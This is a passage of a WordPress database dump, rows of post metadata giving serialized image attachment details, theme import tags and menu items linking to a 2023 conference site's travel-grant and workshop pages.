(5271,2252,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:498;s:6:\"height\";i:62;s:4:\"file\";s:27:\"2018/06/s-soft-lg-sm-hd.png\";s:8:\"filesize\";i:6232;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"s-soft-lg-sm-hd-300x37.png\";s:5:\"width\";i:300;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8178;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"s-soft-lg-sm-hd-150x62.png\";s:5:\"width\";i:150;s:6:\"height\";i:62;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1696;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5272,2252,'dt-img-hide-title','1'),
(5273,2252,'_the7_imported_item','software-company'),
(5274,2253,'_wp_attached_file','2018/06/s-soft-lg-sm.png'),
(5275,2253,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:249;s:6:\"height\";i:31;s:4:\"file\";s:24:\"2018/06/s-soft-lg-sm.png\";s:8:\"filesize\";i:2820;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"s-soft-lg-sm-150x31.png\";s:5:\"width\";i:150;s:6:\"height\";i:31;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1445;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5276,2253,'dt-img-hide-title','1'),
(5277,2253,'_the7_imported_item','software-company'),
(5278,2254,'_wp_attached_file','2018/06/the7-new-fav1.gif'),
(5279,2254,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:16;s:6:\"height\";i:16;s:4:\"file\";s:25:\"2018/06/the7-new-fav1.gif\";s:8:\"filesize\";i:1302;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5280,2254,'dt-img-hide-title','1'),
(5281,2254,'_the7_imported_item','software-company'),
(5282,2255,'_wp_attached_file','2018/06/the7-new-fav-hd1-2.gif'),
(5283,2255,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:32;s:6:\"height\";i:32;s:4:\"file\";s:30:\"2018/06/the7-new-fav-hd1-2.gif\";s:8:\"filesize\";i:1521;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5284,2255,'dt-img-hide-title','1'),
(5285,2255,'_the7_imported_item','software-company'),
(5286,2259,'_wp_attached_file','2020/02/woocommerce-placeholder.png'),
(5287,2259,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:35:\"2020/02/woocommerce-placeholder.png\";s:8:\"filesize\";i:102644;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12560;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"woocommerce-placeholder-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:92182;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4228;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58715;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5288,2259,'_the7_imported_item','software-company'),
(5289,2260,'_wp_attached_file','revslider/the7-software-company-slider/trade091.jpg'),
(5290,2260,'_the7_imported_item','software-company'),
(5291,2260,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:51:\"revslider/the7-software-company-slider/trade091.jpg\";s:8:\"filesize\";i:77786;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"trade091-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12899;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"trade091-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71351;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"trade091-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6935;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"trade091-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47396;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5292,2261,'_wp_attached_file','revslider/the7-software-company-slider/trade191.jpg'),
(5293,2261,'_the7_imported_item','software-company'),
(5294,2261,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:51:\"revslider/the7-software-company-slider/trade191.jpg\";s:8:\"filesize\";i:127589;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"trade191-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16531;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"trade191-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103357;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"trade191-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8672;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"trade191-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67738;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5295,2262,'_wp_attached_file','revslider/the7-software-company-slider/trade061.jpg'),
(5296,2262,'_the7_imported_item','software-company'),
(5297,2262,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:51:\"revslider/the7-software-company-slider/trade061.jpg\";s:8:\"filesize\";i:101148;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"trade061-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13120;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"trade061-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83022;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"trade061-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6346;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"trade061-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53642;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5298,2263,'_wp_attached_file','revslider/the7-software-company-slider/trade221.jpg'),
(5299,2263,'_the7_imported_item','software-company'),
(5300,2263,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:51:\"revslider/the7-software-company-slider/trade221.jpg\";s:8:\"filesize\";i:177348;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"trade221-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18547;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"trade221-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134399;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"trade221-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8439;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"trade221-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84366;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5301,2264,'_wp_attached_file','revslider/the7-software-company-slider/art-sl1.png'),
(5302,2264,'_the7_imported_item','software-company'),
(5303,2264,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:548;s:6:\"height\";i:550;s:4:\"file\";s:50:\"revslider/the7-software-company-slider/art-sl1.png\";s:8:\"filesize\";i:28414;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"art-sl1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34755;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"art-sl1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9266;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5304,2265,'_wp_attached_file','revslider/the7-software-company-slider/slider-trade-logo1.png'),
(5305,2265,'_the7_imported_item','software-company'),
(5306,2265,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:109;s:6:\"height\";i:131;s:4:\"file\";s:61:\"revslider/the7-software-company-slider/slider-trade-logo1.png\";s:8:\"filesize\";i:6887;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5308,2167,'_edit_lock','1668031703:1'),
(5309,2266,'_wp_attached_file','2022/10/gswmain.jpg'),
(5310,2266,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1225;s:6:\"height\";i:140;s:4:\"file\";s:19:\"2022/10/gswmain.jpg\";s:8:\"filesize\";i:96606;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"gswmain-300x34.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3426;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"gswmain-1024x117.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19512;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"gswmain-150x140.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6109;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"gswmain-768x88.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12945;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5311,2267,'_wp_attached_file','2022/10/P1.png'),
(5312,2267,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:628;s:4:\"file\";s:14:\"2022/10/P1.png\";s:8:\"filesize\";i:280086;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"P1-300x147.png\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34819;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"P1-1024x502.png\";s:5:\"width\";i:1024;s:6:\"height\";i:502;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:248096;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"P1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19804;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"P1-768x377.png\";s:5:\"width\";i:768;s:6:\"height\";i:377;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:158740;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5313,2268,'_wp_attached_file','2022/10/gswmain-1.jpg'),
(5314,2268,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1225;s:6:\"height\";i:140;s:4:\"file\";s:21:\"2022/10/gswmain-1.jpg\";s:8:\"filesize\";i:96606;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"gswmain-1-300x34.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3426;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"gswmain-1-1024x117.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19512;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"gswmain-1-150x140.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6109;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"gswmain-1-768x88.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12945;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5315,2270,'_wp_attached_file','2022/10/dr-ismael.png'),
(5316,2270,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:100;s:6:\"height\";i:99;s:4:\"file\";s:21:\"2022/10/dr-ismael.png\";s:8:\"filesize\";i:21273;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5317,2271,'_wp_attached_file','2022/10/dr-ismael-1.png'),
(5318,2271,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:100;s:6:\"height\";i:99;s:4:\"file\";s:23:\"2022/10/dr-ismael-1.png\";s:8:\"filesize\";i:21273;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5319,2272,'_wp_attached_file','2022/10/dr-naser.jpg'),
(5320,2272,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:162;s:6:\"height\";i:162;s:4:\"file\";s:20:\"2022/10/dr-naser.jpg\";s:8:\"filesize\";i:34494;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"dr-naser-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4452;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5321,2275,'_wp_attached_file','2022/10/aast32.jpg'),
(5322,2275,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:18:\"2022/10/aast32.jpg\";s:8:\"filesize\";i:648885;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"aast32-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18108;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"aast32-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166553;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"aast32-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7483;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"aast32-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99502;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5323,2276,'_wp_attached_file','2022/10/aast32-1-e1664971733712.jpg'),
(5324,2276,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:955;s:6:\"height\";i:517;s:4:\"file\";s:35:\"2022/10/aast32-1-e1664971733712.jpg\";s:8:\"filesize\";i:648885;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"aast32-1-e1664971733712-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15291;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"aast32-1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166553;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"aast32-1-e1664971733712-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7332;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"aast32-1-e1664971733712-768x416.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:416;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75610;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5325,2277,'_wp_attached_file','2022/10/aast33.jpg'),
(5326,2277,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1100;s:6:\"height\";i:650;s:4:\"file\";s:18:\"2022/10/aast33.jpg\";s:8:\"filesize\";i:359490;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"aast33-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16392;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"aast33-1024x605.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:605;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147275;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"aast33-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7439;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"aast33-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88658;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5327,2281,'_menu_item_type','custom'),
(5328,2281,'_menu_item_menu_item_parent','0'),
(5329,2281,'_menu_item_object_id','2281'),
(5330,2281,'_menu_item_object','custom'),
(5331,2281,'_menu_item_target',''),
(5332,2281,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5333,2281,'_menu_item_xfn',''),
(5334,2281,'_menu_item_url',''),
(5336,2282,'_menu_item_type','custom'),
(5337,2282,'_menu_item_menu_item_parent','0'),
(5338,2282,'_menu_item_object_id','2282'),
(5339,2282,'_menu_item_object','custom'),
(5340,2282,'_menu_item_target',''),
(5341,2282,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5342,2282,'_menu_item_xfn',''),
(5343,2282,'_menu_item_url','https://gsw2023.com/index.php/travel-grants/'),
(5345,2283,'_menu_item_type','custom'),
(5346,2283,'_menu_item_menu_item_parent','0'),
(5347,2283,'_menu_item_object_id','2283'),
(5348,2283,'_menu_item_object','custom'),
(5349,2283,'_menu_item_target',''),
(5350,2283,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5351,2283,'_menu_item_xfn',''),
(5352,2283,'_menu_item_url','https://gsw2023.com/index.php/workshops/'),
(5354,2284,'_menu_item_type','custom'),
(5355,2284,'_menu_item_menu_item_parent','0'),
(5356,2284,'_menu_item_object_id','2284'),
(5357,2284,'_menu_item_object','custom'),
(5358,2284,'_menu_item_target',''),
